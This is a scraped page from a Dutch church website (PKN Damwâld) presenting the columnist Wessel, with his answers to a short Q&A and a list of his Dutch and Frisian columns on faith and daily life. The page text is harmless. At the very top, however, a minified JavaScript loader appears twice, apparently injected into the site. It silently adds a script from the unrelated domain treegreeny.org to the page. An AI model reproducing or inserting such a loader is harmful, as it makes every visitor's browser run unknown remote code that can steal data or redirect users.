;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Wessel - PKN Damwâld
Columnist Wessel
Even voorstellen  …
Wie is je grote voorbeeld?

Grote voorbeeld: heb ik niet, althans als je het menselijk bekijkt. Ik heb wel grote bewondering voor mijn grootouders die in de oorlogstijd een Joodse onderduiker in hun huis opnamen met de wetenschap dat wanneer de vijand er achterkwam zij die niet zouden overleven.

Wat is je favoriete dier en waarom?

Ik ben geen dierenliefhebber, ik heb zelfs een hekel aan honden. Als ik dan toch een dier moet noemen is dat de zwarte beer. Tijdens onze vakantie in Alaska zagen wij een moederbeer met 2 jongen  –  prachtig en indrukwekkend !

Wat is het spannendste dat je ooit hebt gedaan?

Ik denk dat dat voor mij mijn eerste vliegreis was; Ik durfde nooit te vliegen maar had beloofd eens met haar naar Canada te zullen gaan. Ik ben nog geen echte liefhebber van vliegen maar het went wel en ik moet wel zeggen, als je eenmaal vliegt heb je weinig last meer van vliegangst en wanneer je boven Groenland of het noorden van Canada vliegt en het land goed goed kunt zien is dat wel indrukwekkend.

Columns van Wessel
Little drummer boy Gepubliceerd op: vrijdag 24 november 2023
As Jo it opskrift boppe dizze column lêze tinke Jo miskien: ‘Wat sille wy no hawwe, in column yn  it Ingelsk’. Mar dêr sil ik my net oan weachje, ik hâld it mar by ús eigen moaie taal. Ferline jier haw ik...
Gedicht Gepubliceerd op: vrijdag 4 augustus 2023
Iedereen heeft vast wel eens een gedicht gelezen. In veel dagbladen worden zelfs regelmatig gedichten van streek- of gemeentedichters opgenomen. Er is zelfs een dichter des Vaderlands. Maar als je 10 mensen vraagt welk gedicht of welk soort van gedichten hun voorkeur...
De Weg Gepubliceerd op: vrijdag 5 mei 2023
Waarschijnlijk heeft U het ook wel eens of zelfs meerdere keren meegemaakt. Je hoort een lied of leest een tekst en dat blijft dan maar in je hoofd rondzingen. Het kan een psalm zijn of een meer werelds lied,...
De drie zeven van Socrates Gepubliceerd op: vrijdag 13 januari 2023
In het najaar van 2022 heb ik dit verhaal van Socrates gehoord tijdens een zangdienst. Ik vond het een heel wijs verhaal. Vaak zijn we geneigd om een roddel aan te horen, door te vertellen en het vaak nog...
Waarom … Gepubliceerd op: vrijdag 30 september 2022
Iedereen vraagt zich wel eens af waarom bepaalde dingen gebeuren. Of dat nu zaken betreffen in het grote wereld gebeuren, zoals oorlogen, hongersnoden, natuurrampen, ongelukken en dergelijke grote nare gebeurtenissen of dat het zaken betreffen in de eigen leefomgeving,...
Wie is Hij toch ? Gepubliceerd op: zaterdag 25 juni 2022
Meerdere mensen hebben een (of meerdere) favoriete Bijbeltekst(en) of Bijbelgedeelte(s). Bij de een is dat een bepaalde psalm, bij een ander een van de spreuken van Salomo of een woord van Jezus. Ook vinden veel mensen een favoriete Bijbelpassage...
Tevreden met lage cijfers Gepubliceerd op: woensdag 2 maart 2022
Twee mensen ontmoetten elkaar in de wachtkamer van de huisarts en naast het gesprek over het weer, de indeling van de Hoofdweg, de (ontbrekende) rotondes en het voetbal raakten ze ook in gesprek over medische zaken.  De ene man...
Mary did you know Gepubliceerd op: maandag 27 december 2021
In  normale omstandigheden zouden in deze tijd veel samenkomsten worden gehouden, zowel concerten als zangavonden, waarin bekende Kerstliederen zouden worden gezongen. Liederen als ‘Ere zij God’ en ‘Stille Nacht’ staan eigenlijk bij elke zangdienst of bij elke uitvoering op het...
De Wederkomst Gepubliceerd op: maandag 4 oktober 2021
Enige tijd geleden waren er meerdere mensen, zelfs binnen Christelijke geloofsgemeenschappen, die naar hun overtuiging exact wisten aan te geven wanneer de Here Jezus terugkomt op deze aarde. Sommigen waren iets minder pertinent en gaven aan dat naar hun mening het...
Ik winskje dy genôch Gepubliceerd op: vrijdag 2 juli 2021
Jierren lyn haw ik dit prachtiche stik lêzen en ik soe it graach mei jimme  diele wolle: Op in fleanfjild hearde ik in gesprekje fan in heit mei syn dochter krekt foar dat hja fuort gean soe. It tiidstip fan...
Columnist worden?

Altijd al schrijver willen zijn, maar nooit de gelegenheid gekregen? In het bezit van sterke verhalen? Een uitgesproken mening? Een komische kijk op de zaken des levens? Een gouden pen ook toevallig? Grijp dan nu je kans!

Wordt columnist van onze werve(le-)nde kerkwebsite! Schrijf één keer in de 10 weken een column over een boeiend onderwerp. Dit kan van alles zijn, van Bijbelboek tot een gebeurtenis in onze tijd.

Neem contact op!